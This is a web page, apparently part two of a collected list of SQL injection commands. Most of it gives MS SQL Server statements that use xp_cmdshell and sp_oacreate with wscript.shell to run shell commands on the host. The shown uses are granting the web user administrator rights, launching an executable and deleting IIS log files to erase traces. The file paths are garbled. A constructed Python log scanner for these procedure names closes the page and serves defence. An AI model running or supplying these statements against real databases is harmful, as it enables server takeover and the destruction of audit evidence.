The Most Complete SQL Injection Commands and Methods - Collected from the Web (Part 2)
2014-11-24 01:41:56
stem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c: emp.txt,0,true
EXEC sp_oacreate scripting.filesystemobject,@fso output
EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,Readline,@out out
insert INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
The following adds the WEB user to the administrators group, written as a single line:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate wscript.shell,@shell output EXEC sp_oamethod @shell,run,null,cmd.exe /c cscript C:InetpubAdminScriptsadsutil.vbs set /W3SVC/InProcessIsapiApps "C:WINNTsystem32idq.dll" "C:WINNTsystem32inetsrvhttpext.dll" "C:WINNTsystem32inetsrvhttpodbc.dll" "C:WINNTsystem32inetsrvssinc.dll" "C:WINNTsystem32msw3prt.dll" "C:winntsystem32inetsrvasp.dll">c: emp.txt,0,true EXEC sp_oacreate scripting.filesystemobject,@fso output EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt WHILE @shell>0 BEGIN EXEC sp_oamethod @file,Readline,@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
The following runs an EXE program, written as a single line:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate wscript.shell,@shell output EXEC sp_oamethod @shell,run,null,cmd.exe /c cscript.exe E:jeea.net.cnscoreftsimagesiis.vbs lh1 c:>c: emp.txt,0,true EXEC sp_oacreate scripting.filesystemobject,@fso output EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt WHILE @shell>0 BEGIN EXEC sp_oamethod @file,Readline,@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
Three ways to execute CMD commands from SQL:
First, delete the 7.18 log:
(1)exec master.dbo.xp_cmdshell del C:winntsystem32logfilesW3SVC5ex050718.log >c: emp.txt
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate wscript.shell,@shell output EXEC sp_oamethod @shell,run,null,cmd.exe /c del C:winntsystem32logfilesW3SVC5ex050718.log >c: emp.txt,0,true EXEC sp_oacreate scripting.filesystemobject,@fso output EXEC sp_oamethod @fso,opentextfile,@file out,c: emp.txt WHILE @shell>0 BEGIN EXEC sp_oamethod @file,Readline,@out out insert INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,AtEndOfStream,@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
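
A defender's view of the statements above, as an added example that is not part of the original page: a scan of web server logs for the procedure and COM object names these statements rely on. The log lines are constructed, and the IIS W3C extended log layout and the function names are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Names taken from the statements on this page.
INDICATORS = (
    "xp_cmdshell", "sp_oacreate", "sp_oamethod", "sp_oagetproperty",
    "wscript.shell", "scripting.filesystemobject",
)

# Constructed sample in IIS W3C extended format (documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-18 10:01:02 192.0.2.10 GET /news.asp id=12 200
2005-07-18 10:01:09 198.51.100.7 GET /news.asp id=12;EXEC+master.dbo.xp_cmdshell+%27placeholder%27 500
2005-07-18 10:01:15 198.51.100.7 GET /news.asp id=12;exec%20Sp_OACreate%20wscript.shell,@shell%20output 500
2005-07-18 10:02:40 192.0.2.10 GET /search.asp q=shell+scripting+tutorial 200
"""

def normalize(query: str) -> str:
    """URL-decode once, then fold whitespace and case so matching is uniform."""
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()

def scan_w3c_log(text: str) -> dict:
    """Map each client IP to the sorted indicator names seen in its query strings."""
    columns, findings = [], defaultdict(set)
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            columns = line.split()[1:]  # column order is declared in the log itself
            continue
        if not line or line.startswith("#") or not columns:
            continue
        row = dict(zip(columns, line.split()))
        query = normalize(row.get("cs-uri-query", ""))
        hits = {name for name in INDICATORS if name in query}
        if hits:
            findings[row.get("c-ip", "unknown")] |= hits
    return {ip: sorted(names) for ip, names in findings.items()}

if __name__ == "__main__":
    for ip, names in scan_w3c_log(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

The benign search request in the sample produces no finding, because matching is on the full procedure and object names rather than on words such as "shell".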
